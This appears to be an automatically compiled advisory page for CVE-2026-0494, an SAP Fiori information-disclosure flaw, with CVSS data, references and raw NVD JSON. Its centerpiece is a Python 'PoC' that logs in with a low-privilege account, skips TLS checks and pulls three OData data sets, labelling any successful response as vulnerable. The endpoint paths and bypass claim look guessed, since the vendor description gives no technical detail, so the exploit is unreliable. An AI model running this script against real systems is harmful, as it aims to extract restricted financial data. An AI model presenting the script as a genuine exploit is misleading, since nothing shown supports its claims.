Security Vulnerability Report
CVE-2026-0494 CVSS 4.3 MEDIUM

CVE-2026-0494

Published: 2026-01-13 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

Under certain conditions, the SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has a low impact on the confidentiality of the application; integrity and availability are not impacted.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (affected versions are listed in SAP Note 3655227)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-0494 PoC - SAP Fiori Information Disclosure
# Requires a low-privilege SAP account
import requests
import json

TARGET = "https://sap-system.example.com"
USERNAME = "attacker_account"
PASSWORD = "password"


def exploit_cve_2026_0494():
    """
    SAP Fiori Intercompany Balance Reconciliation - Unauthorized Access
    Vulnerability: Insufficient access control on specific endpoints
    """
    session = requests.Session()

    # Step 1: Authenticate with the low-privilege account (HTTP basic auth).
    # login_url is built but never requested; authentication happens implicitly
    # on the first request through session.auth.
    login_url = f"{TARGET}/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS"
    session.auth = (USERNAME, PASSWORD)

    # Step 2: Attempt to access the restricted endpoints.
    # The vulnerability allows bypassing access controls.
    exploit_paths = [
        "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/IntercompanyBalanceSet",
        "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/CompanyCodeDataSet",
        "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/LedgerDataSet",
    ]

    results = []
    for path in exploit_paths:
        response = session.get(f"{TARGET}{path}", verify=False)
        if response.status_code == 200:
            results.append({
                "path": path,
                "status": "VULNERABLE",
                "data": response.json(),
            })
    return results


if __name__ == "__main__":
    print("CVE-2026-0494 PoC - Testing SAP Fiori Information Disclosure")
    data = exploit_cve_2026_0494()
    print(json.dumps(data, indent=2))
```

References

https://me.sap.com/notes/3655227
https://url.sap/sapsecuritypatchday

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-0494",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:51.667",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Under certain conditions SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has low impact on confidentiality of the application, integrity and availability are not impacted."
      },
      {
        "lang": "es",
        "value": "Bajo ciertas condiciones, la aplicación SAP Fiori Intercompany Balance Reconciliation permite a un atacante acceder a información que de otro modo estaría restringida. Esto tiene un bajo impacto en la confidencialidad de la aplicación; la integridad y la disponibilidad no se ven afectadas."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-497"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3655227",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}
```